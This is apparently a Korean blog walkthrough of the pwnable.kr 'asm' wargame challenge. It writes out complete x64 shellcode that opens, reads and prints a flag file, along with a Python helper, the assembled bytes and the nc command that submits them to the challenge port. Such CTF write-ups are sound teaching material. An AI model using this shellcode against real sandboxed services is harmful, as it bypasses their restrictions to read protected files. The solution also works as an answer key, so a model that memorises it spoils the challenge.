Pwnable.kr ASM
안녕하십니까. 상감자입니다. 토들러 문제를 들고와 애석하지만 shell code를 어셈블리로 직접 짜 보는데 의미가 있어서 올려봅니다.
우선 asm파일과 asm.c 파일 그리고 플래그 this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong 파일, readme파일이 있습니다.
이때 우리는 긴 플래그 파일을 열어야합니다.
우리는 asm을 실행해본다면 read, write, open 함수를 사용하여 64bit 쉘코드를 입력하라고 한다.
따라서 우리는 먼저 어떻게 어셈으로 코딩할지 c로 짜보고 코딩해보자.
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
int main()
{
int fd;
char buf[1024];
fd = open("./this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong", O_RDONLY);
read(fd, buf, 1024);
write(1, buf, 1024);
// puts(buf);
return ;
}
이런식의 c언어를 어셈블리로 짜보자 우선 python 소스를 짜서 긴 flag 파일을 넣어줄 수 있게 little endian 방식으로 만들어 주어야 한다. 또 우리는 x64소스를 짜는 데 x64는 mov 만 16bit를 넣어줄 수 있기 때문에 넣을 값을 rax값에 넣고 rax를 push 하는 방식으로 사용해야 한다.
먼저 python 소스를 보자
a = "this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong".encode("hex")
b=[]
c=[]
for i in range(0,len(a)/2+1):
b.append(a[i*2:i*2+2])
#b[i] = "\\x"+b[i]
b.reverse()
#print(b)
for j in range(0,len(b)/8):
c.append(b[j*8]+b[j*8+1]+b[j*8+2]+b[j*8+3]+b[j*8+4]+b[j*8+5]+b[j*8+6]+b[j*8+7])
h=0
for k in c:
print "mov rax, 0x"+k
print "push rax"
이 파이썬을 돌리면 우리는 넣을 수 있는 코드를 만들 수 있다.
section .data
section .bss
buf: resb 4
section .text
global _start
_start:
push rbp
mov rbp, rsp
mov rax, 0x676e6f306f306f30
push rax
mov rax, 0x6f306f306f306f30
push rax
mov rax, 0x3030303030303030
push rax
mov rax, 0x3030306f6f6f6f6f
push rax
mov rax, 0x6f6f6f6f6f6f6f6f
push rax
mov rax, 0x6f6f6f6f6f6f6f6f
push rax
mov rax, 0x6f6f303030303030
push rax
mov rax, 0x3030303030303030
push rax
mov rax, 0x3030303030303030
push rax
mov rax, 0x3030306f6f6f6f6f
push rax
mov rax, 0x6f6f6f6f6f6f6f6f
push rax
mov rax, 0x6f6f6f6f6f6f6f6f
push rax
mov rax, 0x6f6f6f6f6f6f6f6f
push rax
mov rax, 0x6f6f6f6f6f6f6f6f
push rax
mov rax, 0x6f6f6f6f6f6f6f6f
push rax
mov rax, 0x6f6f6f6f6f6f6f6f
push rax
mov rax, 0x6f6f6f6f6f6f6f6f
push rax
mov rax, 0x6f6f6f6f6f6f6f6f
push rax
mov rax, 0x6f6f6f6f6f6f6f6c
push rax
mov rax, 0x5f797265765f7369
push rax
mov rax, 0x5f656d616e5f656c
push rax
mov rax, 0x69665f6568745f79
push rax
mov rax, 0x72726f732e656c69
push rax
mov rax, 0x665f736968745f64
push rax
mov rax, 0x6165725f65736165
push rax
mov rax, 0x6c705f656c69665f
push rax
mov rax, 0x67616c665f726b2e
push rax
mov rax, 0x656c62616e77705f
push rax
mov rdx, 0x0
mov rsi, 0x0
mov rdi, rsp
mov rax, 2
syscall
mov rdi, rax
mov rsi, buf
mov rdx, 100
mov rax, 0
syscall
mov rdi, 1
mov rsi, buf
mov rdx, 100
mov rax, 1
syscall
이렇게 만들어 주면 우리는 read, write, open을 사용하여 로컬 환경에서 flag를 띄워 줄 수 있는 어셈 소스를 만들었다. 그렇다면 우리는 이 환경이 아닌 pwnable에서 가능한 어셈을 만들어 주어야 한다.
이것을 우리는 기계어로 바꾸어 주어야 한다. 다른 문제에서는 null 값을 제거 해주어야 하지만 이 문제에서는 null을 신경안써도 된다.
위의 코드는 로컬환경에서 만든 소스이기 때문에 buf 값을 우리가 정해서 사용했지만 실제 코드를 실행시키기 위해서는 c 파일에 있는 char* sh = (char*)mmap(0x41414000, 0x1000, 7, MAP_ANONYMOUS | MAP_FIXED | MAP_PRIVATE, 0, 0);에서 할당된 영역안으로 넣어주어야 한다.
따라서 우리는
section .data
section .bss
buf: resb 4
section .text
global _start
_start:
mov rax, 0x676e6f306f306f
push rax
mov rax, 0x306f306f306f306f
push rax
mov rax, 0x3030303030303030
push rax
mov rax, 0x303030306f6f6f6f
push rax
mov rax, 0x6f6f6f6f6f6f6f6f
push rax
mov rax, 0x6f6f6f6f6f6f6f6f
push rax
mov rax, 0x6f6f6f3030303030
push rax
mov rax, 0x3030303030303030
push rax
mov rax, 0x3030303030303030
push rax
mov rax, 0x303030306f6f6f6f
push rax
mov rax, 0x6f6f6f6f6f6f6f6f
push rax
mov rax, 0x6f6f6f6f6f6f6f6f
push rax
mov rax, 0x6f6f6f6f6f6f6f6f
push rax
mov rax, 0x6f6f6f6f6f6f6f6f
push rax
mov rax, 0x6f6f6f6f6f6f6f6f
push rax
mov rax, 0x6f6f6f6f6f6f6f6f
push rax
mov rax, 0x6f6f6f6f6f6f6f6f
push rax
mov rax, 0x6f6f6f6f6f6f6f6f
push rax
mov rax, 0x6f6f6f6f6f6f6f6f
push rax
mov rax, 0x6c5f797265765f73
push rax
mov rax, 0x695f656d616e5f65
push rax
mov rax, 0x6c69665f6568745f
push rax
mov rax, 0x7972726f732e656c
push rax
mov rax, 0x69665f736968745f
push rax
mov rax, 0x646165725f657361
push rax
mov rax, 0x656c705f656c6966
push rax
mov rax, 0x5f67616c665f726b
push rax
mov rax, 0x2e656c62616e7770
push rax
mov rax, 0x5f73695f73696874
push rax
mov rdx, 0x0
mov rsi, 0x0
mov rdi, rsp
mov rax, 2
syscall
mov rdi, rax
mov rsi, 0x41414800
mov rdx, 100
mov rax, 0
syscall
mov rdi, 1
mov rsi, 0x41414800
mov rdx, 100
mov rax, 1
syscall
위의 소스로 쉘코드를 만들어 주면 된다.
objdump -D ‘실행파일명’ 을 뽑아내어 쉘코드를 하나하나 숫자를 이어붙여도 되지만 편하게 하기위해서 https://defuse.ca/online-x86-assembler.htm 이곳에서 위의 소스를 붙여넣어주면 우리는 쉘코드를 획득할 수 있다.
그렇게 변환시켜주게 되면 나온 소스를 pwnable 서버에 파이썬 소스를 만들어 실행시켜주어야 한다.
a = "\x48\xB8\x6F\x30\x6F\x30\x6F\x6E\x67\x00\x50\x48\xB8\x6F\x30\x6F\x30\x6F\x30\x6F\x30\x50\x48\xB8\x30\x30\x30\x30\x30\x30\x30\x30\x50\x48\xB8\x6F\x6F\x6F\x6F\x30\x30\x30\x30\x50\x48\xB8\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x50\x48\xB8\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x50\x48\xB8\x30\x30\x30\x30\x30\x6F\x6F\x6F\x50\x48\xB8\x30\x30\x30\x30\x30\x30\x30\x30\x50\x48\xB8\x30\x30\x30\x30\x30\x30\x30\x30\x50\x48\xB8\x6F\x6F\x6F\x6F\x30\x30\x30\x30\x50\x48\xB8\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x50\x48\xB8\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x50\x48\xB8\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x50\x48\xB8\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x50\x48\xB8\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x50\x48\xB8\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x50\x48\xB8\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x50\x48\xB8\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x50\x48\xB8\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x6F\x50\x48\xB8\x73\x5F\x76\x65\x72\x79\x5F\x6C\x50\x48\xB8\x65\x5F\x6E\x61\x6D\x65\x5F\x69\x50\x48\xB8\x5F\x74\x68\x65\x5F\x66\x69\x6C\x50\x48\xB8\x6C\x65\x2E\x73\x6F\x72\x72\x79\x50\x48\xB8\x5F\x74\x68\x69\x73\x5F\x66\x69\x50\x48\xB8\x61\x73\x65\x5F\x72\x65\x61\x64\x50\x48\xB8\x66\x69\x6C\x65\x5F\x70\x6C\x65\x50\x48\xB8\x6B\x72\x5F\x66\x6C\x61\x67\x5F\x50\x48\xB8\x70\x77\x6E\x61\x62\x6C\x65\x2E\x50\x48\xB8\x74\x68\x69\x73\x5F\x69\x73\x5F\x50\x48\xC7\xC2\x00\x00\x00\x00\x48\xC7\xC6\x00\x00\x00\x00\x48\x89\xE7\x48\xC7\xC0\x02\x00\x00\x00\x0F\x05\x48\x89\xC7\x48\xC7\xC6\x00\x48\x41\x41\x48\xC7\xC2\x64\x00\x00\x00\x48\xC7\xC0\x00\x00\x00\x00\x0F\x05\x48\xC7\xC7\x01\x00\x00\x00\x48\xC7\xC6\x00\x48\x41\x41\x48\xC7\xC2\x64\x00\x00\x00\x48\xC7\xC0\x01\x00\x00\x00\x0F\x05"
import sys
sys.stdout.write(a)
이렇게 만든 파이썬 소스를 tmp폴더에 자신만의 다른 폴더를 만들고 소스를 넣어주고 난 후에 asm에 돌리면 fake flag라고 뜬다. 그래서 readme 파일을 만들어보면 nc 0 9026으로 보내주라고 나온다.
따라서 우리는 python /tmp/자신이만든 폴더/만든 소스.py | nc 0 9026 을 입력해 주면 우리가 원하는 플래그가 나온다.